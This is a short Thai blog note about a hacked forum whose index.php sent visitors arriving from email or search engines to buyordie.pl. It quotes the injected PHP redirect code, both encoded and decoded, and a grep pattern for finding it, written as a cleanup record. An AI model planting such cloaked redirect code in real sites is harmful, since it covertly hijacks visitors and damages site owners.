เมื่อเปิดเวปจากเมล์ทีไร ทำไมมันต้องเข้า buyordie.pl ทุกที???
เวปโดน hack คราวก่อน มันฝัง Code เอาไว้ ทำให้เวลาเข้าเวปจากอีเมล์มันจะ redirect ไปเวป buyordie.pl ก่อนทุกครั้ง แต่ถ้าเรียกเวปตรงๆ ไม่ยักกะเจอ.. มันก็เก่งเนอะ
หาๆ ไปก็เจอจาก //forum.ragezone.com/6149126-post1.html
แบบแรก
แบบนี้แหละที่มันเอาไปใส่ smf ไฟล์ index.php เพื่อโหลดทุกครั้งที่มีการกด links มาหาหน้า index.php นี้
แบบสอง error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) { if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: //buyordie.osa.pl/"); exit(); } }
แบบสาม header("Location: //buyordie.osa.pl/");
ครบเชียว
อีกแหล่งไม่ตรงเท่าไหร่ แต่ก็คล้ายๆ กัน //www.jorgepablos.com/2011/03/watch-out-php-5-2-vulnerability-google-results-finditnow-osa-pl/
The following grep search in the site’s document root confirmed our worst fears: 1 grep -rl "eval(base64_decode" * <<----- นี่แหละ ที่โดน
About 20 PHP files were found to have this piece of “disguised” code on top: 01 // Original code: 02 eval(base64_decode(DQplcnJvcl9yZX[... more stuff here ...])); 03 04 // When decoded, the lines look like this: 05 error_reporting(0); 06 $nccv=headers_sent(); 07 if (!$nccv){ 08 $referer=$_SERVER['HTTP_REFERER']; 09 $ua=$_SERVER['HTTP_USER_AGENT']; 10 if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) { 11 if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ 12 header("Location: //buyordie.osa.pl/"); 13 exit(); 14 } 15 } 16 }
Credit all content by all owner (( THANK YOU ))
จบๆ note ไว้กันลืม
Create Date : 31 มีนาคม 2554 |
|
1 comments |
Last Update : 31 มีนาคม 2554 11:12:13 น. |
Counter : 675 Pageviews. |
|
|
|